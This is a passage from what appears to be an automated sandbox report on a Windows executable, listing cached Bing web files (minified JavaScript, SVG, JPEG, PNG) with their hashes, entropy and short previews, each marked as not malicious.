                                                                                                                                                                                                        Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var c;u=u||r;var o=_ge("id_rh"),e=_ge("rh_animcrcl"),l=_ge("id_rc");if(o&&l&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var a=800,v=r-n,s=Math.min(100,100*(r/u)),h=e&&s>=100&&n<u,y=v>0,p=Date.now();s>=100&&Lib.CssClass.add(o,"rh_reedm");e&&Lib.CssClass.add(e,"anim");c=function(u){if(u){var k=Date.now(),w=k-p,b=Math.min(w/a,1),d=h?t*b:t*s/100,g=y?Math.min(Math.floor((n+b*v)/f)*f,r):r,l=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",d.toString()+","+t.toString());u.innerText=g.toString();(h||y)&&(w<a?i(function(){return c(u)}):(u.i

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cTjovfJ8fuNtDtyC0VQH35vgAUI.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (2014), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2016
                                                                                                                                                                                                        Entropy (8bit):5.3161096027675105
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:bnXL8sjfZ/Fslrgj3rzIRlK0KqoLi7XSOLFTt+jCz1T9XNZTs3Gan/An0:bnoshqlMQRlZTolKOEXNZsWan/An0
                                                                                                                                                                                                        MD5:D807DBBB6EE3A78027DC7075E0B593FF
                                                                                                                                                                                                        SHA1:27109CD41F6B1F2084C81B5D375EA811E51AC567
                                                                                                                                                                                                        SHA-256:0ACDCE370092C141B0C6617ED6E2163F04BB9B93D3213B62C2BC7A46FE0243C7
                                                                                                                                                                                                        SHA-512:E037DFC31D595B459660FE7D938EEDB4F43D208D247174EE8D6FD0D125F211142CD73497E4601893CECB6F565B7E2E7815CE416D72BB95504D3F277E4E806D11
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var SerpKeyboardNavigation;(function(){function c(){h=_d.activeElement;n=null;u=null;e=!1;t=-1;nt();u=_w.NavSelector&&NavSelector(!1)}function p(){v();n=null}function w(i){var e,h,o;i&&(e=_d.activeElement,h=s&&e&&e.className&&e.className.indexOf("feedback-binded")!==-1,i.keyCode==r.Tab&&s&&(f("TOP"),s=!1),u&&e&&e.className!=="b_searchbox"&&!h&&(i.keyCode==r.Enter?(n=null,f(t==-1?"EN":"EE",t)):b(i)&&(o=k(i.keyCode),o!==-1&&o!==t&&(tt(o),sj_pd(i)))))}function f(n,t){sj_log("CI.SerpKeyboardNav",n,t?t.toString():"")}function b(t){var i,r=(i=_d.querySelector("#b_sydConvCont cib-serp"))===null||i===void 0?void 0:i.getAttribute("mode");return n||h==_d.activeElement?t.altKey||t.ctrlKey?!1:r&&["conversation","notebook"].includes(r)?!1:!0:!1}function k(n){if(n===r.Tab)return d();if(n===r.Down||n===r.Up){var t=document.activeElement;return t&&(t.tagName.toLowerCase()==="select"||t.tagName.toLowerCase()==="input")?-1:g(n===r.Down)}return-1}function d(){var i=-1;return n?(v(),e=!0,t=-1,f("TO")):(i=

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cfeVf2-uV0hUo3ToTbLjztuomWk[1].jpg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:51:08], progressive, precision 8, 160x158, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4547
                                                                                                                                                                                                        Entropy (8bit):7.735536921390623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ssb41dk9JozAQ8d2SuBK76KrZDoDBtnFKiDo8TzNnNJSHvLPS:sj1eozAQ8d2VPGoBBFfM4fJSHDPS
                                                                                                                                                                                                        MD5:7AEF4CCF6E47B9BA038365CD3D1F5693
                                                                                                                                                                                                        SHA1:71F7957F6FAE574854A374E84DB2E3CEDBA89969
                                                                                                                                                                                                        SHA-256:08102BA7A0388B1AFC9A351B3387B2DDEDA846551303170E0273B2F305AECCB2
                                                                                                                                                                                                        SHA-512:29AC1E6BADF62C61B4FA889EA1B0436D3B9107A60BA03801DFA8E23A4D8BCCF42C09BB7CC7E6CD9FACB8D140DB7E0D4F0EEB3D7D8A3B9B38B1D2B95113005320
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:51:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................VQJ,..R...)..(..R..d.Y@...h..%(.AW(T.)...5.,.%.2[.."*!l...Z......@I..T.......@3.@....D@ ..l.)E.P....ts......@... E".W/G...........IQ..I|../.,..W..(....WY.1<.t..=....K...C....-.1..s.[l...^].mO7|..:.kda5....o.=.S.8.;....~e,.......1v..~5.:s'$..u.i..k.7._E25...f6v..Nk.&)....S.r...ovn5...k9k...u.D...f&.......e.+.7......d..7K.R]..f..K..l...r...*.K.b..s29...y;..U.E(.qH....,....QS%..@....'......................... !."1.#$0@.`............R.J..e~...+.J.....y..7#..^....,.....@.3..`.....L...[u.!.../...*;[7.,...a....[._W...B;.....4g+../c..>g...!..U..Q...0...$..F%...u|.2?.V.>.v..2.2.S.c..km)

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\fDgf7Oh5R8mPygWLQcaNRoJGj5Q.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (622), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):622
                                                                                                                                                                                                        Entropy (8bit):5.265947581512117
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2QxhNgpOWEaaRHkj6iLUEkFKgsmqRRV6alt0Tk6iLUEkFkno:2QTepraRHk+i1kFKgsmqRRVZr8k6i1kh
                                                                                                                                                                                                        MD5:3104955279E1BBBDB4AE5A0E077C5A74
                                                                                                                                                                                                        SHA1:BA10A722FFF1877C3379DEE7B5F028D467FFD6CF
                                                                                                                                                                                                        SHA-256:A0A1CEE602080757FBADB2D23EAD2BBB8B0726B82FDB2ED654DA4403F1E78EF1
                                                                                                                                                                                                        SHA-512:6937ED6194E4842FF5B4878B0D680E02CAF3185BAF65EDC131260B56A87968B5D6C80F236C1DE1A059D8158BC93B80B831FE679F38FC06DFB7C3413D1D5355AA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function n(){var n=_ge("id_p"),t,r,i;n&&(t="",r="",n.dataset?(t=n.dataset.src,r=n.dataset.alt):(t=n.getAttribute("data-src"),r=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=r},n.src=t,i=_d.getElementById("bp_shortcut_img"),i&&(i.setAttribute("src",t),i.onerror=function(){i.setAttribute("src","data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=")})))}n()})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\fHuyi8cU3N_FKljgNDAU8JiBqx0.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (888), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):888
                                                                                                                                                                                                        Entropy (8bit):5.1970220185324045
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2QiCUrgtI/QHnUrtrRIRJ7ea/TwH4Mnbx+yGow0N:SK44AIb/7QUH0N
                                                                                                                                                                                                        MD5:F1CF1909716CE3DA53172898BB780024
                                                                                                                                                                                                        SHA1:D8D34904E511B1C9AAE1565BA10CCD045C940333
                                                                                                                                                                                                        SHA-256:9ABAC0CBFA6F89106B66CD4F698EAD5CCBF615ECF8CD7E9E88567A7C33CFEC01
                                                                                                                                                                                                        SHA-512:8B641E93405565B4A57C051EDEFC8E02D6C929DDD4C52F9BFBD19C57896AA40426BF5ED6760DBD479719561C4F0A25BFC4102F0F49D3D308035C9CA90B1D0FCE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function f(){var u=o(),i,t,f;if(u)for(i=s(u),t=0;t<i.length;t++)f=i[t].id.replace(n,""),Log&&Log.Log&&Log.Log("Info",r,f,!1,"Text",t.toString()),sj_be(i[t],"mousedown",e)}function e(t){var r=i(t.target),f;r!=null&&(f=r.id.replace(n,""),Log&&Log.Log&&Log.Log("Info",u,f))}function i(t){if(t!=null){var r=t.id;return r!=null&&r.indexOf(n)===0?t:i(t.parentElement)}return null}function o(){var n=_d.querySelectorAll(".b_scopebar > ul");return n&&n.length>0?n[0]:null}function s(i){for(var r,o,u=[],e=i.children,f=0;f<e.length;f++)r=e[f].id,r!=null&&r!==t&&r.indexOf(n)===0?u.push(e[f]):r!=null&&r===t&&(o=h(),u.push.apply(u,o));return u}function h(){var n=_d.querySelectorAll(".b_scopebar #b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item");return Array.prototype.slice.call(n)}var n="b-scopeListItem-",t=n+"menu",r="DynScopeRank",u="DynScopeClick";sj_evt.bind("onP1",f)})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\fdVZU4ttbw8NDRm6H3I5BW3_vCo[1].svg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):671
                                                                                                                                                                                                        Entropy (8bit):5.014579690661168
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tbH4/KYf3UnlcWYl7qy/gk63xsV8tGXcqecDDWUV8jEPsycd23Wt+MKsAnueOc+d:t74LfEnTYpq+gTxs6GUUQEPssmYsAnuH
                                                                                                                                                                                                        MD5:D9ED1A42342F37695571419070F8E818
                                                                                                                                                                                                        SHA1:7DD559538B6D6F0F0D0D19BA1F7239056DFFBC2A
                                                                                                                                                                                                        SHA-256:0C1E2169110DD2B16F43A9BC2621B78CC55423D769B0716EDAA24F95E8C2E9FE
                                                                                                                                                                                                        SHA-512:67F0BC641D78D5C12671FDD418D541F70517C3CA72C7B4682E7CAC80ABE6730A60D7C3C9778095AAB02C1BA43C8DD4038F48A1A17DA6A5E6C5189B30CA19A115
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" enable-background="new 0 0 16 16" xml:space="preserve">..<path fill="#919191" d="M15.707,0.293c-0.391-0.391-1.024-0.391-1.415,0L7.994,6.591L1.696,0.293C1.298-0.091,0.665-0.08,0.281,0.318...c-0.375,0.388-0.375,1.003,0,1.391l6.298,6.298l-6.298,6.298c-0.384,0.398-0.373,1.031,0.025,1.415c0.388,0.375,1.003,0.375,1.391,0...l6.298-6.298l6.298,6.298c0.398,0.384,1.031,0.373,1.415-0.025c0.375-0.388,0.375-1.003,0-1.39L9.409,8.006l6.298-6.298...C16.098,1.317,16.098,0.684,15.707,0.293z"/>..<path fill="none" d="M0,0h16v16H0V0z"/>..</svg>..

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\kAwiv9gc4HPfHSU3xUQp2Xqm5wA[1].png

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 1030 x 92, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9310
                                                                                                                                                                                                        Entropy (8bit):7.907965931624856
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:qnmErbd5SU2ipCfR6VY9Fcygr2XecqN4zvEd4xSNzvkmglkz80bl7xcnobmP:S5bdAU3EJiHpSucq+z64xSlp40Bx8oKP
                                                                                                                                                                                                        MD5:1947B15739221EB0DB271C1DD8F95E46
                                                                                                                                                                                                        SHA1:900C22BFD81CE073DF1D2537C54429D97AA6E700
                                                                                                                                                                                                        SHA-256:FBF7FE8197902B32CE2C83F05DB73255553C716AC7B084FF1878E617963D0F51
                                                                                                                                                                                                        SHA-512:E73B17A0CCAEA85C539B5DA3BA978EBDA519D68F5686894EBEBBB529DCA54D07CA3508DBCED9D8F56D71D49469FA5916A7255B6CA455E00251D81B5E03410E5C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR.......\.......Gi...sPLTEGpL.e"..?..?..=........................uut.............O..K..J..J..K..K..J..J..M..O..S..O.uux.V..K.....ffffff.I.2..1..%q..>. Y.$d.BFBDDDDDDBGB.K...........K.$i.#a.DDDDDDDDDuww......!\.DDDDDDuwx.J.....\.$g. Z.CCCvvzvxywx{"^.CCCvwywx{vvwvvzwx{vwxxx|wx{wxzfff%.....$h.DDDCCC.h..[..x.._..S.vvx...9..._.%h.!`.DDD...AHAuwx.R..O.m.cK.}....U.g.c..N.Qs.X..]d..8..&.c...2.....$........#..e....'..h.vw.......XS..i........[..b.rC.H=www...zzz........T..................................J...................qqqqqqqqq.k..m.......413..................vvv....l.......uuu....m..................................................."........".."...\......tRNS..@..@.....` ...p.@.......p .``P.P_.........Z...0........p0_....P0....@@....... .p........"..R..@...0..0..... ...w...0..@.....X.......b.......... `......P@....p1`P.......=............p....D@..M.'.....0....Y.... .IDATx...Ub.@...S.ic.A.....E.....=%0s...^k"..S)..cff.U.en..".FS.Bm.j.m.....&.,.Y.0..........k.E.*U

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\kiGH9ukZK6Q4hvtDtwwVc1yvueg[1].svg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1391
                                                                                                                                                                                                        Entropy (8bit):4.796412914000846
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:t4LxSdeBU4dxCey0fA53J/S/7/sG5BmefEqrR5GTGOby2NF2E/:+xSUBU4S55Z/aB5BmefEqrRYK6
                                                                                                                                                                                                        MD5:620580657E8A45B4A7B8450B8DA5CD32
                                                                                                                                                                                                        SHA1:922187F6E9192BA43886FB43B70C15735CAFB9E8
                                                                                                                                                                                                        SHA-256:91DE3100632E986CDB6897793EF1B2A8655B15ED4145098CA489856C043D207E
                                                                                                                                                                                                        SHA-512:F3CE71CD92BA2C6ABD6CDEE48F677522439CAD023042D56728E5CB2DED5EC51D1170308FB1524C4A352AC6C5E4E514147D21B99667CCE54CE35A73D91DD27E4B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 40 40" width="64" height="64">.. <style type="text/css">.. .anim {.. animation-name: blink;.. animation-duration: 1s;.. animation-iteration-count: infinite;.. fill: #05E9F5;.. transition-timing-function: linear;.. }.. @keyframes blink {.. 0% {.. opacity: 0.. }.. 50% {.. opacity: 1.. }.. 75% {.. opacity: 1.. }.. 100% {.. opacity: 1.. }.. }.. .delay1 {.. animation-delay: 0s;.. }.. .delay2 {.. animation-delay: .125s;.. }.. .delay3 {.. animation-delay: .25s;.. }.. .delay4 {.. animation-delay: .375s;.. }.. .delay5 {.. animation-delay: .5s;.. }.. .delay6 {.. animation-delay: .675s;.. }.. .delay7 {.. animation-delay: .75s;.. }.. .delay8 {.. animation-delay: .875s;.. }.. </style>.. <circle class="delay1 anim" cx="20" cy="8" r="3" />.. <circle class="delay5 anim"

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nt6a1ZR520utsLoZmSYgwxdOPgI[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (606), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):606
                                                                                                                                                                                                        Entropy (8bit):5.268639530160161
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:hc2AcBdEcv2Csu+IUhIlaq1YkOcAwI98NyeTgy8XTQHY2:hc2AcBSBZacr98XSDuY2
                                                                                                                                                                                                        MD5:0C2672DC05A52FBFB8E3BC70271619C2
                                                                                                                                                                                                        SHA1:9EDE9AD59479DB4BADB0BA19992620C3174E3E02
                                                                                                                                                                                                        SHA-256:54722CF65AB74A85441A039480691610DF079E6DD3316C452667EFE4A94FFD39
                                                                                                                                                                                                        SHA-512:DD2B3E4438A9DEAA6B306CBC0A50A035D9FE19C6180BC49D2A9D8CDBB2E25D9C6C8C5265C640AC362DC353169727F8C26503E11A8A061A2517A303F61D0CCD3C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var sj_rra=function(n){var i="/rewardsapp/reportActivity",f=_w.location.search.substring(1),u=window.data_iid,r,t,e;i+=u&&u.length>0?"?IG="+_G.IG+"&IID="+u+"&"+f:"?"+f;r=window.rw_mqs_cg;r&&r.length>0&&(i+="&cg="+r,window.rw_mqs_cg=undefined);_w._H&&_w._H.mkt&&(i+="&src=hp");t=sj_gx();e="url="+escape(n)+"&V=web";t.open("POST",i,!0);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.onreadystatechange=function(){t&&t.readyState==4&&t.status==200&&t.responseText&&_w.sj_appHTML&&(sj_appHTML(document.body,t.responseText),sj_evt&&sj_evt.fire("serpThemeUpdatedByRewards"))};t.send(e)}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tu4B7zHYu6pOPvbqssygkItBFMg.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15678), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15678
                                                                                                                                                                                                        Entropy (8bit):5.324358729025482
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:90RU0qFPpFQ2cLJoyPKWrEysjXryLnmVyYNnL3/9BD1DdNCgTlPlMHEyM2hluZX7:90RtqppFyoyCcEys7UnpYdv9j2gRPlm8
                                                                                                                                                                                                        MD5:F420F6495D96A09B18AE9C2D2D53663C
                                                                                                                                                                                                        SHA1:89E4AEF1AE72AF0F7730B212577176003EB44BA2
                                                                                                                                                                                                        SHA-256:CB2E879CEE77E2116DA4608857CA8D66A053FADF41C72BA60C1CEE0100DE1EC4
                                                                                                                                                                                                        SHA-512:9FB9C37C154B855314D185AADC055134975E0F7A2703EA362DFC2F8DED589ABA77DC25F006CF004DD193EA68B026BC2B089EC27ADA26C81CA950A83DF0FE154C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:define("ajax.shared",["require","exports"],function(n,t){function r(n){var r=keyMap[n]?keyMap[n]:keyMap.Prefix+n,i=document.getElementById(r),t;return!i&&document.getElementsByClassName&&(t=document.getElementsByClassName(r),i=t&&t.length?t[0]:null),i}function u(n){var f=sj_ce("a"),t,r,u;return f.href=n,t=f.pathname,t[0]!=="/"&&(t="/"+t),t=t.replace(i,"/"),r="",t==="/"?r=t:(u=n.indexOf(t),r=u>-1?n.substr(u):""),r}function f(n,t,i){for(;n&&n!==document;n=n.parentNode){if(n[t]===i)return n;if(n===undefined)break}}var i=/^(\/)(\1+)/;t.useSetBag=!1;t.ajaxUrlBag="";t.getPlaceholder=r;t.getRelativeUrl=u;t.getParentContainer=f});define("ajax.cache",["require","exports"],function(n,t){function w(n,t,i,r){if(n>=0){var u=g(n);switch(t){case"Script":u.ScriptHolder.push(r);break;case"Style":u.Style+=r;break;case"EOS":u.Script=u.ScriptHolder;delete u.ScriptHolder;u[t]=r;c(i,u);break;default:u[t]=r}}}function b(n){var t=sessionStorage.getItem(i+n);return t?JSON.parse(t):null}function c(n,t){_G.JCach

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\uk_UtgpS3Vx82_2KByeueWFHn_Q.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6526), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6526
                                                                                                                                                                                                        Entropy (8bit):5.372135202911853
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:/CaRENlgVMJhPbrtwyGBdnxEd7NUCuf1bx6gqkJD:aaREXPbOLdxEd7NUnf1twI
                                                                                                                                                                                                        MD5:6904ABA1CE02BB3A01B6550C4BF98A7E
                                                                                                                                                                                                        SHA1:858127221DAF72534247D665BE661A175FAD6DD6
                                                                                                                                                                                                        SHA-256:4492B7EF7F9E30168D8F6410FF6928FCC3019618019116F82B25459B9267B038
                                                                                                                                                                                                        SHA-512:EBD259047BCDED6F925C3184A27D0D197D48B0EE3EBC2C12A27A2C9843B08C551D6DC34C299CD6E4931446F33C1D6BFF3F8CDEB018FB6C614671CF43B6497585
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var WebResultToolboxBlueV2;(function(){function tt(){var n=_ge("b_results"),t=_ge("b_context");(n||t)&&typeof sa_CTBConfig!="undefined"&&sa_CTBConfig&&(r[b]=ot,r[k]=l,r[d]=l,r[g]=c,r[nt]=c,sj_be(sj_b,"click",function(n){u(n)}),sj_evt.bind("onPopTR",function(n){u(n,!0)}),sj_be(sj_b,"mousedown",function(n){h(n)}),sj_be(sj_b,"mouseup",function(n){h(n)}),n&&s(n.firstChild),t&&s(t.firstChild))}function it(n){return _G.abdef_sarc!=undefined&&n.classList.contains(_G.abdef_sarc)}function s(n){n&&n.nodeType==1&&!it(n)&&(ut(n),s(n.nextSibling))}function rt(n,t,i){for(var r=-1;i--&&r++<n.length;)if(r=n.indexOf(t,r),r<0)break;return r}function ut(n){var y,u,t,c,f,s,l,a;if(n){var r=ct(sa_CTBConfig.toolboxTriggerClassName,n,"span"),h=n.getElementsByTagName("cite"),e=v(n,"u");e&&i(e,"u")[0]==="e"&&(e=null);y=sa_CTBConfig&&sa_CTBConfig.disableMetaData=="1";r&&(h.length||y)&&(u=h.length>0?h[0]:null,n.tt=r,ft(n,e)&&bt(n)&&(t=sj_ce("a"),t.href="#",t.className="trgr_icon",t.setAttribute("aria-label",sa_CT

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\we5MTeTkjiic9oaBxzZpmSWxZ5k.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (838), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                        Entropy (8bit):5.10179630103155
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:01rReu5mXKBj/BsKkRW5LuRWCfRM7ssdvcR:09wwDEw56w2+s6cR
                                                                                                                                                                                                        MD5:8C8B189422C448709EA6BD43EE898AFB
                                                                                                                                                                                                        SHA1:A4D6A99231D951F37D951BD8356D9D17664BF447
                                                                                                                                                                                                        SHA-256:567506D6F20F55859E137FCBD98F9E1A678C0D51192FF186E16FD99D6D301CFF
                                                                                                                                                                                                        SHA-512:6FAA73D59082065426769A27081CBEDCD22146EF948AFDD9A86801F205B2DDDC63E03AC5D555EF0AF23EF05901EBFFE7E8AADD82260EF505CB89D99E572FDF4A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var CursorProgress;(function(n){function f(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function e(n){var u,e,o,s;n.button!==0||n.ctrlKey||n.shiftKey||(u=f(sj_et(n)),u!=null)&&u.getAttribute("role")!=="button"&&(r(),e=(u.getAttribute("href")||"").trim().toLowerCase(),e!==""&&e.indexOf("javascript:")!==0&&e.indexOf("#")!==0)&&(o=u.getAttribute("target"),o===null||o.trim()==="")&&(Lib.CssClass.add(u,t),s=_ge("b_content"),s!==null&&Lib.CssClass.add(s,t),i!==null&&(sb_ct(i),i=null),i=sb_st(r,5e3))}function r(){for(var i=_d.getElementsByClassName(t),n=i.length-1;n>=0;n--)Lib.CssClass.remove(i[n],t)}function u(){var r=_ge("b_content"),n,t,i;if(r!==null&&(n=r.getElementsByTagName("A"),n))for(t=0;t<n.length;t++)(i=n[t],i)&&sj_be(i,"click",e)}var t="b_CursorProgress",i=null;n.bind=u;u()})(CursorProgress||(CursorProgress={}))

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\43BJuM7qM_8Wd1WfIZM2_oK9zrw.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (371), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):371
                                                                                                                                                                                                        Entropy (8bit):4.964799787793963
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:qGD7/TMvKyYLwRMF4owANCqwvpkTzT6n0evROARDCMwzkk6Km0Msv/Gvz:JPwKVDJHCqspkZeZJDC/wKE
                                                                                                                                                                                                        MD5:B743465BB18A1BE636F4CBBBBD2C8080
                                                                                                                                                                                                        SHA1:7327BB36105925BD51B62F0297AFD0F579A0203D
                                                                                                                                                                                                        SHA-256:FEE47F1645BC40FBC0F98E05E8A53C4211F8081629FFDA2F785107C1F3F05235
                                                                                                                                                                                                        SHA-512:5592DEF225E34995F2F4E781F02CC2B489C66A7698D2FEFF9AC9A71F09E5284B6BBDB065E1DF9C06ADFB1F467D5627FBD06E647ABF4E6AB70CF34501232126AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var SbiPrivacy;(function(){function t(){var i,r,t,u;if(typeof SbiUtil!="undefined"&&SbiUtil.rt&&_d.querySelectorAll)for(i=SbiUtil.rt.querySelectorAll(".sbiinflnk[data-link]"),r=function(t){var i=t.target;i.hasAttribute(n)&&(i.href=i.getAttribute(n),i.removeAttribute(n))},t=0;t<i.length;t++){u=i[t];SbiUtil.oncop(u,r)}}var n="data-link";t()})(SbiPrivacy||(SbiPrivacy={}))

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\8rqwN7Xb28A6E1cuZBn327GVXX0.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):219
                                                                                                                                                                                                        Entropy (8bit):5.119404786158862
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGXh6BodmYWyXPBsw+SFsjRntLsMIxwCDrlT:2QBdoySw+YEOM8nlT
                                                                                                                                                                                                        MD5:33C123623267DDCCC3506DE4E71C105B
                                                                                                                                                                                                        SHA1:61C759ACDD259A7520988C3D0D58BB4C5A25D87E
